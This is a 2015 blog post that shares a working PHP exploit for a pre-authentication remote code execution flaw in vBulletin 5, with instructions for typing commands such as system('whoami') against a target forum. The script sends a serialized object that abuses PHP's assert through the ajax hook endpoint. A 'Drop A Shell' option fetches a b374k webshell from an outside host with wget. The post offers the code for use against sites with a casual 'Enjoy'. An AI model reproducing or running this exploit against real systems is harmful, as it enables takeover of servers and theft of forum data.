2015-11-17

VB 5 preauth RCE (Remote code execution) exploit

Pranaam to all _/\_

this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz)

script is developed by someone else

just type target forum link and in command box type whatever command you want to execute,
syntax is system('your_command');
like ls
so type system('ls');
if you want to execute whoami command type system('whoami');

Enjoy


source code is
//////////code starts

<?php

/*
Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman
*/
if (isset($_POST['target'])) {
$host = $_POST['target'];
 $path = '/ajax/api/hook/decodeArguments?arguments=';
class vB_Database {
public $functions = array();

public function __construct()
{
$this->functions['free_result'] = 'assert';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;

public function __construct()
{
if(isset($_POST['command'])) {
$command = $_POST['command'];
} else if (isset($_POST['shell'])) {
$command = 'system(wget http://b374k.webshell-archive.org/b374k.txt)';
} else {
echo 'Choose One Option';
}
//echo $command."<br>";
$this->db = new vB_Database();
$this->recordset = $command;
}
}
$payload = urlencode(serialize(new vB_dB_Result()));
echo $url = $host.$path.$payload;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec ($curl);
curl_close ($curl);
print $result;
} else {
echo '<body bgcolor="black">
<div align="center">
<form action="" method="POST">
<font color="green">
<h1>VBulletin 5.x.x PreAuth Remote Code Execution Exploit</h1>
Enter Your Hostname example(http://www.vulnerablesite.com/vbulletin/)<br><br>
<input type=text name=target value="target.com"><br><brs>
<h2>Execute A Command</h2>

Enter Your command <input type="text" name="command"><br /><br />
<input type="submit">
<h2>Drop A Shell</h2>
<input type="submit" value="Shell" name="shell">
</font>
</form>
</div>
</body>';
}
?>


//////code ends here
Share this post

0 comments

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top